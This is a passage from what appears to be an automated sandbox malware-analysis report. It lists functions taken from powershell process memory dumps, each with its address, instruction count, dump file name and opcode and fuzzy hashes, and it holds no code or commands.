                                              • Opcode ID: 353cfd17aa0aaf576fe8020eca7e3b20bf5f3a92f0c056a8b183cf729da8b680
                                              • Instruction ID: 27e37bcba3a514aabc4f549515fecc282181d121ec311c59242bf478a4bf3e0e
                                              • Opcode Fuzzy Hash: 353cfd17aa0aaf576fe8020eca7e3b20bf5f3a92f0c056a8b183cf729da8b680
                                              • Instruction Fuzzy Hash: 6B21E7753046049BCF155A55D980B7ABBA6ABC161AF1CC06AD498DFA82C779C842CB21
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FF388 Relevance: .1, Instructions: 68COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e58c70326a2ca77acc163345eb8931cf227824c239f5ea0b2a619418a7fab8b8
                                              • Instruction ID: 06c341642959d5f0bcaf2f89f47bba7d7eaf37d315f4fd9124883de91327ff91
                                              • Opcode Fuzzy Hash: e58c70326a2ca77acc163345eb8931cf227824c239f5ea0b2a619418a7fab8b8
                                              • Instruction Fuzzy Hash: 8B211B34B006048FEB14DF79C954AAD7AB6EF88715F148469D502AB3A1CE759C42CB64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089E4860 Relevance: .1, Instructions: 66COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: be9b940e68dd71002b74507021c965c3b2021c8d486e734ed333d0ac6a338188
                                              • Instruction ID: eaeb970b5a22025162398b367818720e6c0e01629624a522b460d1cbd862b2c6
                                              • Opcode Fuzzy Hash: be9b940e68dd71002b74507021c965c3b2021c8d486e734ed333d0ac6a338188
                                              • Instruction Fuzzy Hash: 3A21C534B00B598FEB25EF65C5447AE7BF9AF88705F10442DE441B7241CB78D940CB98
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08890B08 Relevance: .1, Instructions: 64COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: efb8f1c23c8120dd483afe5b934c3c100141037183b88fc028ec4890f22255ac
                                              • Instruction ID: 8f054e1679441f315a7ed7da627f33e992d37f87836932bace23f95ee9feb1be
                                              • Opcode Fuzzy Hash: efb8f1c23c8120dd483afe5b934c3c100141037183b88fc028ec4890f22255ac
                                              • Instruction Fuzzy Hash: EB11E735300608ABCF145E49D580B7AF396ABC061AF5CC029E898DFA81C77ADC42CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EB839 Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e2043a60f02d2fcb2c8b639b970e0da4655a5500c1b4e380dffcfcbe04c7a247
                                              • Instruction ID: 5adbdce1ffd4b2617e2fb331e76bc06a3b57641812bd52c8f27c3d6a7abcacdb
                                              • Opcode Fuzzy Hash: e2043a60f02d2fcb2c8b639b970e0da4655a5500c1b4e380dffcfcbe04c7a247
                                              • Instruction Fuzzy Hash: 1B11A230B052984FEB15FA75C810BAF7FF6AF89219F14886CD48177290CB756901D761
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FE978 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4536e043517c2e9cd7ec8edf3b9921d84ff1b28565a0cf35f897d5b86631c137
                                              • Instruction ID: 086a80c5591567a2326e73b94ae66c67dc2887ad16c2e175a95dd902bea61a11
                                              • Opcode Fuzzy Hash: 4536e043517c2e9cd7ec8edf3b9921d84ff1b28565a0cf35f897d5b86631c137
                                              • Instruction Fuzzy Hash: AB118C70A002089FCB11DFA9D8408EEBFF6EF89210B10856EE905E7312C6319906CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089E4628 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 718798fbad22cf5d1fd6d93b4cc396adfa6bcbf182c6bbeed037d397bfeaa4c2
                                              • Instruction ID: ea423921c68e1ac260a4dbf4a66beec86f676fb69ab1db7702d3e1bbbe98930e
                                              • Opcode Fuzzy Hash: 718798fbad22cf5d1fd6d93b4cc396adfa6bcbf182c6bbeed037d397bfeaa4c2
                                              • Instruction Fuzzy Hash: F411DF32D042998FEF25EFA9C8007EDBFF1AF48315F14446EE480B7281CA695D84CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EB848 Relevance: .1, Instructions: 59COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dbab2504d9cb9cf9f47607dfd67f487a45b5b6a04ff6939a7a32579c60d006b5
                                              • Instruction ID: 3f5876a1f126e6003aa03bcfd74cbed6b95121a62385b600a73b0e7abab66092
                                              • Opcode Fuzzy Hash: dbab2504d9cb9cf9f47607dfd67f487a45b5b6a04ff6939a7a32579c60d006b5
                                              • Instruction Fuzzy Hash: 0111BE31B002488BEB15FE75C8107EFBBF6AF8821AF14886CD485B7280CB756900DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FA858 Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c4e499a3389067ba4cd076602ce39963f48284c4bbadbf824b486770e6bad942
                                              • Instruction ID: bd744bd9e66c7567b559cee3a9f123537298be3c2862fb2680307d49df7ab9ab
                                              • Opcode Fuzzy Hash: c4e499a3389067ba4cd076602ce39963f48284c4bbadbf824b486770e6bad942
                                              • Instruction Fuzzy Hash: 33119D70900299AFDB05DFA8D884AEEBFF6EF89310F14802AE945F7252C7704941CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EB938 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3eba70f5bca5689955e4618cbfa71c34aad7832729ccb2f2a6546f996aa21bae
                                              • Instruction ID: 492a571fa2363cee199fd57c403aa00a06a9a8bdce2fa754428d89d189d05a66
                                              • Opcode Fuzzy Hash: 3eba70f5bca5689955e4618cbfa71c34aad7832729ccb2f2a6546f996aa21bae
                                              • Instruction Fuzzy Hash: 6D01F5323457608FC7162738B91856E7BAADFC9626309006EE80AD73D1CE389C0787A6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F2420 Relevance: .1, Instructions: 55COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0394ea443a767f037c24e8c191ed5b03e8af9d873178470a0c2c5eda99776efe
                                              • Instruction ID: 6298f688f46ef88eaa4a41a8dc74bf7c83585c95ada8e8154c7043df4eecdf37
                                              • Opcode Fuzzy Hash: 0394ea443a767f037c24e8c191ed5b03e8af9d873178470a0c2c5eda99776efe
                                              • Instruction Fuzzy Hash: 9C11A030B013518FDB02DBA9D8509EF7BA29FC5310F044179D944AF356DB34DC068BA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089E4850 Relevance: .1, Instructions: 55COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7d67d16f40fab3279be693a78589fd3b4019bcb63476efb2ac5be40dd6830f5e
                                              • Instruction ID: a0bdc1af90db7c8a6fd05bd3c81cf9f49d7c455d7d0d3b35f78fa4d1bfe2f060
                                              • Opcode Fuzzy Hash: 7d67d16f40fab3279be693a78589fd3b4019bcb63476efb2ac5be40dd6830f5e
                                              • Instruction Fuzzy Hash: 5A11E735B00B984FEB26EF65D8147AE7FFA6F88605F04446DD485B7282DF798800C798
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FE988 Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4b91a70396ad1d1dfbb02d9c43cc1c6ac86ef860e52fd72c10c0087b3a0d6004
                                              • Instruction ID: 66e1d5fda6f72d66cf9ec76baf324e79f2c4df24d2d591a6d6ffeb467ebec432
                                              • Opcode Fuzzy Hash: 4b91a70396ad1d1dfbb02d9c43cc1c6ac86ef860e52fd72c10c0087b3a0d6004
                                              • Instruction Fuzzy Hash: 11113A71E002089FDF14DFA9D8409EEBBFAEF8C210B00852AE905E7311DB3199058FA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A5160 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1bfbb435c005c8e01fc20ad80f34ba33c7f7797441cbd4fdd770c368335bf9b7
                                              • Instruction ID: 102604b40511fbdd5bafb9b91a3b0513378f936c2ef88b28ec20e1148d19003e
                                              • Opcode Fuzzy Hash: 1bfbb435c005c8e01fc20ad80f34ba33c7f7797441cbd4fdd770c368335bf9b7
                                              • Instruction Fuzzy Hash: 3701213A704104AF5B14DE9EE88497BF79EFBD8262714C52BE949CB315DB71DC0187A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F93E0 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 29d89616b9c6729e2b76ae97a52bfe6399aa7878f57c38cd08a5039f8d69dbc4
                                              • Instruction ID: 2349d6afe1777eaa7dd5db8da40907004f7d16f071d3e66272d48b72e8d978a3
                                              • Opcode Fuzzy Hash: 29d89616b9c6729e2b76ae97a52bfe6399aa7878f57c38cd08a5039f8d69dbc4
                                              • Instruction Fuzzy Hash: 0D110470A453806FE7118BA89C10BAB7F75DF86B10F1500BAE5889F2C3CAB15806C7A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 088911F0 Relevance: .1, Instructions: 52COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c5cee72174a61ed2c1e7930d08dcf13dc4dcfaa062027faf794bad1ee29317b6
                                              • Instruction ID: 70a840de233c24efababa9c9cdcdddc76fdda4bad63aa6208334e53f34838ebb
                                              • Opcode Fuzzy Hash: c5cee72174a61ed2c1e7930d08dcf13dc4dcfaa062027faf794bad1ee29317b6
                                              • Instruction Fuzzy Hash: A001F73A3042168BDF15E6EAE4045BAF7D9DFD1262F18C43FE595C7A40E63AC842C7A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FD188 Relevance: .1, Instructions: 52COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: da7b365c0c744c2f2637a91178e1a439d0aad2e4337ec3b1df815c55b305b8e4
                                              • Instruction ID: de7858714c18a4a063146ec510809aeaccf2dd364cf8bd79b0840119ee4d1827
                                              • Opcode Fuzzy Hash: da7b365c0c744c2f2637a91178e1a439d0aad2e4337ec3b1df815c55b305b8e4
                                              • Instruction Fuzzy Hash: 091158316001099FDB149E64D90DAAE7BB5EBC8212F044478EA01AB2A2CE358D01CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089BFF40 Relevance: .1, Instructions: 51COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093096181.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: da3dd21b14672012e7e416306ccb9ea844698942a68c7c589c856e37ccefc6d3
                                              • Instruction ID: e09cf746e797d4ae1d421e808db8d4aa1ce8e35d86efda090f9fc616c032ff32
                                              • Opcode Fuzzy Hash: da3dd21b14672012e7e416306ccb9ea844698942a68c7c589c856e37ccefc6d3
                                              • Instruction Fuzzy Hash: DC11175150F3D24FD703A7749C24285BF755F03215B5A95EBC4C5CF1E3DA195809CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089E9039 Relevance: .1, Instructions: 51COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a9615957fec13c32bcd74d3649b213826ff8d1280840377320a4debcae0f1b14
                                              • Instruction ID: fe532b44394f459dfa35f7269734ddaf05c3e395fb8930bf7312168ed1ac0a75
                                              • Opcode Fuzzy Hash: a9615957fec13c32bcd74d3649b213826ff8d1280840377320a4debcae0f1b14
                                              • Instruction Fuzzy Hash: 9711E135B01611CFCB05EF65E4489AFBFF6FF88212B14802DE85A97341DB309902CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089E9048 Relevance: .1, Instructions: 51COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4455ff5d1e4c29bee12ca9ee73b61abdb7b54ad6c07881ea04c605c26d0b645a
                                              • Instruction ID: ad61aa1c2abcaced9d7f998fe7ba8617e89549c83da27bde76666576a050fe4c
                                              • Opcode Fuzzy Hash: 4455ff5d1e4c29bee12ca9ee73b61abdb7b54ad6c07881ea04c605c26d0b645a
                                              • Instruction Fuzzy Hash: 7A118E35B01715DF8B05EF65E44886EBFFAFF88611750802DE81AD3341DB319A02CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A24C0 Relevance: .0, Instructions: 50COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 485fd8ffd23adf9c3e07b4ada7906c0e0ffb7e8936d29a1d0462401d1980e88b
                                              • Instruction ID: 8189c83500ffb3b151630c31c8d371612027c01749ab58af3e6d944775754496
                                              • Opcode Fuzzy Hash: 485fd8ffd23adf9c3e07b4ada7906c0e0ffb7e8936d29a1d0462401d1980e88b
                                              • Instruction Fuzzy Hash: 4E01A2353006109BDB19A66AA824B7BB7DBDBC4651F14C02AF605CB3E0DE71DC0187A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FB5D8 Relevance: .0, Instructions: 50COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d2bd26f8ecbfc98263bed67ae5e1919cb7df2f384e344e0cd755a90254698b79
                                              • Instruction ID: de0112f416d5a188c2574cd7deafb00335ee786b29894b20c52ae6276fb49adc
                                              • Opcode Fuzzy Hash: d2bd26f8ecbfc98263bed67ae5e1919cb7df2f384e344e0cd755a90254698b79
                                              • Instruction Fuzzy Hash: DB110470A053555BE7118B68DC10BBABFB1EF82B00F2400BAE548AB2D2CBB46805C7E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F2430 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 55dd517210fb8c7efd7dae7885309414b3d068fa6ced404bb9a99ec4d79dbab7
                                              • Instruction ID: b2c3f2c8db3bcd3de1979cc520bae275d5dbde5d36c96d727588426d42bb8be5
                                              • Opcode Fuzzy Hash: 55dd517210fb8c7efd7dae7885309414b3d068fa6ced404bb9a99ec4d79dbab7
                                              • Instruction Fuzzy Hash: 1E019230B007058BEB11DBA9D850AAFBBA6EFC5311F444579E904AB345EF35ED028BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A9E58 Relevance: .0, Instructions: 48COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 81f6568a0e21da82223bf5960417bd38c7bc80d62373670c867c8250805c130e
                                              • Instruction ID: f31256d3306832e760f2f7b4c8a4066446dc57b8c63b1c733b013d3afbd5c046
                                              • Opcode Fuzzy Hash: 81f6568a0e21da82223bf5960417bd38c7bc80d62373670c867c8250805c130e
                                              • Instruction Fuzzy Hash: 6401AD31200B069FD315EB69C844BAAFBE5FFC4225F00862ED44987A91DBB4A855CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A240C Relevance: .0, Instructions: 48COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5c540f12a418ae9d1fdc07ed0e654c1439a1ffb66b1f13cf9bc558a5a2df67ca
                                              • Instruction ID: dbd3c28f80a501ef3578062bc7fde85fc51e58d2ff5a9a27d8366c8117202bde
                                              • Opcode Fuzzy Hash: 5c540f12a418ae9d1fdc07ed0e654c1439a1ffb66b1f13cf9bc558a5a2df67ca
                                              • Instruction Fuzzy Hash: 7311E934A01249EFDF05CF98D484A9EFBB2FF89214F288159E404AB361C775ED82CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EDAA0 Relevance: .0, Instructions: 48COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 36403661501c4f94a2243752469e7169d58ba024499a8a1c1d7f73cc22ac4d4f
                                              • Instruction ID: a9e1f45d1493b7f92587dda6980c8b9a4ed21a824ddc1cf6383557c144731b05
                                              • Opcode Fuzzy Hash: 36403661501c4f94a2243752469e7169d58ba024499a8a1c1d7f73cc22ac4d4f
                                              • Instruction Fuzzy Hash: AC112771E002189FDB19DFAAD840ADDBBFAAF8C200F04842AE414F7261EB709940CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089E5EA0 Relevance: .0, Instructions: 48COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 19327e0b43251f866029b81a43ced6e8fc8f5ec32f41a2188ec17de42479e00e
                                              • Instruction ID: 473a8cc13685d622bb8f2ab352cf52e3f465c7cb0ed5c1a48140a20f7359acc2
                                              • Opcode Fuzzy Hash: 19327e0b43251f866029b81a43ced6e8fc8f5ec32f41a2188ec17de42479e00e
                                              • Instruction Fuzzy Hash: A3111C31A00319DFDB05DFA0D888AEDB7BAFF8830AF01452DE40697240CB34AD42CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FA868 Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9c0a09611dbd4af99bce008fbb3d4f7d88abe8ee41f46adb79b517ab23a137af
                                              • Instruction ID: c5d1470bd108b953ccf50fcf2bbe390cdcf851f2169d454543a5a7a32c1d9e39
                                              • Opcode Fuzzy Hash: 9c0a09611dbd4af99bce008fbb3d4f7d88abe8ee41f46adb79b517ab23a137af
                                              • Instruction Fuzzy Hash: F4113071D0125DAFDF04CFA9D854AEEBFF6AF88310F14802AE904B7251C7705940DBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FD198 Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 11ede28ced48eb3b19347f6f140231ca1ae6465556f80b4b8a9b2961b39cfacc
                                              • Instruction ID: 46bdf5aab210d97722885ed27ff9c7a6d755a23e62eb8e8736ccddb460d2567c
                                              • Opcode Fuzzy Hash: 11ede28ced48eb3b19347f6f140231ca1ae6465556f80b4b8a9b2961b39cfacc
                                              • Instruction Fuzzy Hash: 79113C35A0010DAFDB14DF65D95DAEF7BB9EB88311F104078EA01A7252CF759D00CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04F1D01D Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083632321.0000000004F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F1D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f1d000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e972db840fb857ff8e3dc0219c69da066e65c6199e0867844954672ff0f8eac
                                              • Instruction ID: 885cdf10dbb4a517068d00151d6c92ecf62fc79439dbd05a23a6bb868ab881f9
                                              • Opcode Fuzzy Hash: 0e972db840fb857ff8e3dc0219c69da066e65c6199e0867844954672ff0f8eac
                                              • Instruction Fuzzy Hash: B201A7329043409BE7104F26EC84BA7BBA8DF91224F18C55ADD494E15AD679F842C6B2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04F1D005 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083632321.0000000004F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F1D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_4f1d000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d4dada1100cfcb0f8cfdedf0a46d63f4f3856c4752929d866ea626e95db59aa
                                              • Instruction ID: 651903580736c2b3945c8c592634787f32ff49088faf7959c13dd5432126021e
                                              • Opcode Fuzzy Hash: 1d4dada1100cfcb0f8cfdedf0a46d63f4f3856c4752929d866ea626e95db59aa
                                              • Instruction Fuzzy Hash: 88011E6140E3C05FD7128B259994B92BFB4DF53224F19C1DBD9888F1A7C269A84AC772
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F93F0 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db1f7a0275710b5592e757ac464ba7885505369f71cea8e875570c749879f08b
                                              • Instruction ID: e97cef604b654add4fdb492a74d645cc4ddcd70744a684b8c45ac7d6596d801c
